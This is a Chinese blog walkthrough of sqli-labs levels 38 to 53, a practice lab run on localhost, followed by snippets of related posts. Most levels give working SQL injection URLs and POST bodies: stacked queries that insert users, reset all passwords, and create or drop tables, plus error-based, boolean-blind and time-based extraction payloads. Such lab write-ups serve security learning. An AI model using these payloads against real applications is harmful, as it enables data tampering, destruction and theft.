sqli-labs通关攻略38-53[Stacked Injections]

最新推荐文章于 2024-08-11 22:05:00 发布
原创 最新推荐文章于 2024-08-11 22:05:00 发布 · 5.4k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#SQL注入

Stacked Injections

文章目录

less-38

在这里插入图片描述
由于在这里使用了执行一个或多个sql语句的函数mysqli_multi_query。
所以可以尝试堆叠注入,堆叠注入就是执行多条SQL语句,通过;分割;在实战中,由于正常数据库只会回显出我们想要的结果,所以,堆叠注入在黑盒测试下只能通过模糊测试来进行测试。由于是直接执行多条SQL语句,所以对SQL语句就并无限制,可以通过堆叠注入增删改查等数据库操作。
我们在知道数据库结构后尝试进行插入数据操作

http://127.0.0.1/sql-labs/Less-38/?id=1';insert into users(id,username,password)values(20,'keepb1ue','2020')--+

插入后,我们直接切换到id 20,看看是否插入成功
在这里插入图片描述在这里插入图片描述
当然我们还可以执行任何SQL语句,这也说明了堆叠注入危害极大。

less-39

在这里插入图片描述
和38一样,堆叠注入,只不过将id参数包裹引号去掉罢了。

http://127.0.0.1/sql-labs/Less-39/?id=1;insert into users(id,username,password)values(19,'allblue','2019')--+

在这里插入图片描述

less-40

在这里插入图片描述
不多说

http://127.0.0.1/sql-labs/Less-40/?id=1');insert into users(id,username,password)values(18,'hacker','2018')--+

在这里插入图片描述
在这里插入图片描述

less-41

在这里插入图片描述
还是整数型堆叠注入
在这里插入图片描述

http://127.0.0.1/sql-labs/Less-41/?id=1;update users set password='hacker' 
where id>0--+

将所有密码都改成了hacker在这里插入图片描述

less-42

在这里插入图片描述
基于24关卡新增post的堆叠:

login_user=admin&login_password=1';create table keepb1ue like users#

创建一个和users同样结构的数据库在这里插入图片描述
在这里插入图片描述

less-43

在这里插入图片描述post 闭合’)

login_user=King&login_password=123');insert into users(id,username,password)values(22,'test22','test22')#

在这里插入图片描述
在这里插入图片描述

less-44

在这里插入图片描述
与43比较,只是闭合方式改了和去掉了一个打印报错信息的语句。
那如果在实战中没有报错信息那就只能去fuzz了

login_user=King&login_password=123';drop table keepb1ue#

在这里插入图片描述
在这里插入图片描述

less-45

在这里插入图片描述
mysqli_muti_query,还是闭合 ')堆叠

login_user=King&login_password=123');insert into 
users(id,username,password)values(23,'KB','KB')#

less-46

order by注入
在这里插入图片描述
我们可以通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入
在这里插入图片描述
在这里插入图片描述
证明的确有order by 注入
order by注入有很多种方式进行注入
比如:报错注入、盲注、异或注入。如果达到一定条件还可以联合注入
报错注入很简单:

http://127.0.0.1/sql-labs/Less-46/?sort=1 and 
updatexml(1,concat(0x7e,(select database())),1)

在这里插入图片描述
盲注:

http://127.0.0.1/sql-labs/Less-46/?sort=rand(ascii(left(database(),1))=115)

根据rand来对SQL语句对错做判断,因为rand(True)和rand(False)的回显结果是不一样的。

less-47

在这里插入图片描述
还是闭合不同

http://127.0.0.1/sql-labs/Less-47/?sort=1' and 
updatexml(1,concat(0x7e,(select database())),1) --+

http://127.0.0.1/sql-labs/Less-47/?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

在这里插入图片描述

less-48

在这里插入图片描述
本关与less-46的区别在于报错注入不能使用,不进行错误回显,因此其他的方法我们依旧是可以使用的。
可以利用sort=rand(true/false)进行判断。

http://127.0.0.1/sql-labs/Less-48/?sort=rand(ascii(left(database(),1))=150)

在这里插入图片描述

http://127.0.0.1/sql-labs/Less-48/?sort=rand(ascii(left(database(),1))=115)

在这里插入图片描述
根据rand(true)和rand(fales)的回显不一样做判断,进行布尔盲注

延时:
http://127.0.0.1/sql-labs/Less-48/?sort=1 and (If(ascii(substr(database(),1,1))=115,sleep(5),1))

less-49

在这里插入图片描述
与less47很类似,只是没有错误回显
利用延时注入

http://127.0.0.1/sql-labs/Less-49/?sort=1' and (if(ascii(substr((select username from users where id=1),1,1))=115,0,sleep(5)))--+

less-50

在这里插入图片描述
order by+堆叠注入

http://127.0.0.1/sql/Less-50/?sort=1;create table keepblue like users--+

less-51

在这里插入图片描述
和上一关一样,闭合变成’:

http://127.0.0.1/sql/Less-51/?sort=1';drop table keepb1ue--+

less-52

在这里插入图片描述
去掉了闭合,去掉了错误提示

http://127.0.0.1/sql/Less-52/?sort=1;create table keepb1ue like users--+

less-53

在这里插入图片描述
和51一样的做法,不多做讲解

http://127.0.0.1/sql/Less-53/?sort=1';drop table keepb1ue--+
sqli-labs(38-53)
qq_43395215的博客
08-26 1064
文章目录第38关:第39关:第40关:第41关:第42关:第43关:第44关:第45关:第46关:第47关:第48关:第49关:第50关:第51关:第52关:第53关: 第38关: 这一关挺简单的,就一个闭合判断,就可爆数据,但是,这一关的目的不是查询数据,而是通过堆叠注入,对数据库执行操作 堆叠注入,就是利用sql中“;”是标志一句话结束,我们可以通过“;”将多个语句写入到sql语句中,这里的语句就不仅仅是指查询,还有增删查改 闭合判断: /Less-38/?id=1' and 1=1 --+ sql
SQL注入之堆叠注入sql-lab第38关)
_Co1a
12-22 957
什么是堆叠注入SQL中,分号(;)是用来表示一条SQL语句结束的。试想一下我们在分号结束一个SQL语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而堆叠注入可以执行的是任意语句(增删改查)。 例如以下这个例子: 用户输入:1; delete from products服务器端生成的SQL语句为:select * from products where productid=1; delete from products当执行查询之后,第一条显示查询信息,第二条则是将整个表删除。
SQLi Labs Less-38 堆叠注入
热门推荐
wangyuxiang946的博客
06-22 1万+
第三十八关请求方式为GET请求 , 注入类型为 单引号字符串型注入 第一步,测试注入方式 ?id=1' and false-- a SQL不成立时 , 结果不显示 , 固 单引号字符串型注入 , 源码如下 本题的重点在 mysqli_multi_query() , 可同时执行多条SQL , 即叠加注入 第二步,判断字段数 使用order by 排序 测试字段数量 ?id=1' order by 4 -- a 从第1列开始测试 , 直至报错 , 第4列开始异...
SQLi-LABS Page-3 (Stacked Injections)
qq_61774705的博客
08-10 495
sql
sqli-labs(38)
weixin_30522095的博客
06-01 239
0X01 ?id=1' and 1=1%23 正确   ?id=1' and 1=2%23 错误 存在注入 0x1 堆叠注入讲解 (1)前言   国内有的称为堆查询注入,也有称之为堆叠注入。个人认为称之为堆叠注入更为准确。堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新 的查询或者终止查询,可以达到修改数据和调用存储过程的目的。这种技术在SQL注入中还是比较频繁的。 (2...
Sqli-labs全套(1-65)-通关笔记
TyRant的博客
04-10 4845
Basic Challenges 01-Error Based-Single quotes Error Based: 可以通过报错知道闭合方式 > paylod: ?id=1') and ;--+ 源码拼接后: SELECT * FROM users WHERE id=('$id') LIMIT 0,1; SELECT * FROM users WHERE id=('1') and ;-- ') LIMIT 0,1; > err: You have an error in your SQL
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 2328
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
【合天网安】SQLi-Labs系列之堆叠注入
hehigoxqc606的博客
09-02 454
概念: Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆SQL语句(多条)一起执行。而在真实的运用中也是这样的,在mysql中,主要是命令行中,每一条语句结尾加分号;来表示语句结束。 堆叠注入使用条件 堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysql_multi_query()函数,其只能执行一条语句,分号后面的内容将不会被执行。 任务一:基于GET型的堆叠注..
Sqli-labs-master(1-65)
kfjrlgagkogkhpa的博客
08-11 682
sqli-lab(1-65)
sqli-labs靶场每关的考察重点是什么?
07-25
堆叠注入(Less-38, Less-46等) - **考察重点**:执行多条SQL语句(需要数据库支持) - **示例**(Less-46): ```sql id=1');update users set password='hacked' where user='admin'# ``` - **知识点**:多...
sqli-labs(38-41)
qq_43579362的博客
02-17 466
0x01 原理 堆叠注入,顾名思义就是很多语句结合在一起进行注入,在sql语句中,以;标志着一条语句的结束,要实现堆叠注入就是用;连接多条语句进行注入,即我们可以结束一个语句后,构造下一个语句。而union select也是将两条语句结合在一起一起执行,两者有何区别?区别在于联合注入只能使用查询语句,而堆叠注入可以使用任何语句,可以使用任何语句并不代表着它没有限制,它可能受到API,数据库引擎,权...
sql-labs闯关38~45
qq_44663230的博客
09-07 2036
sql-labs 38~45 堆叠注入
sqli-labs第36~38
weixin_46023655的博客
08-11 582
sqli-labs第36~38
SQLi Labs Stacked Injections ( Lesson38 - Lesson53 )
1ame的博客
08-30 1455
第三部分:Stacked Injection Stacked Queries Execute multiple statements in the same query to extend the possibilities of SQL injections Stacked queries provide a lot of control to the attacker.
sqlilabs38-53详细教程
黑白的博客
11-08 612
声明 学习SQL注入,提高网路安全能力 information_schema 过关之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到关于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show dat
SQLi-LABS-Page-3-less-38-53注入教程
残阳泼茶香的博客
03-17 637
Lesson - 38GET - Stacked Query Injection - String堆叠的查询 输入http://sql/Less-38/?id=1 ’ 报错显示说“1” 后面多了一个单引号, 那么就上手吧。 `http://sql/Less-38/?id=1%27%20order%20by%203%23,按着步骤来,http://sql/Less-38/?id=-1%20%2...
web漏洞-SQL注入漏洞扩展(堆叠查询注入)-SQLi LABS 38关到41关讲解
ranzi.
01-19 883
比如在注入时,需要得到管理员的账号和密码,但是这个密码是加密的,且无法解密,此时便可以利用堆叠注入向管理员用户的表内进行插入用户数据,创建用户来登录迂回的注入数据库,但是前提是网站的管理员必须是高权限才能完全创建用户。因为是插入的数据,所以新插入的管理员用户的密码是自定义的,将用户数据插入之后,就可以实施登录了,此时便可以忽略密码无法解密的问题。区别就在于 union或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。”(返回执行的SQL语句并换行)。
基于Sqli-Labs靶场的SQL注入-38~45关
Joker
01-11 1127
这一篇博客我主要讲了堆叠注入,包括堆叠注入原理、注入条件、注入方法等。堆叠注入的前提条件多,可以实际应用的场景较少。但是只要能够进行堆叠注入,就可以对后台数据库造成很大的伤害。
sqli-labs通关sqlmap
最新发布
12-21
使用sqlmap通关sqli - labs可按如下方法与步骤操作: #### 确定目标URL和请求参数 依据不同关卡,明确目标URL以及对应的请求参数。例如,在第14关,目标URL为 `http://192.168.2.16/sqli-labs/Less-14/`,请求参数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值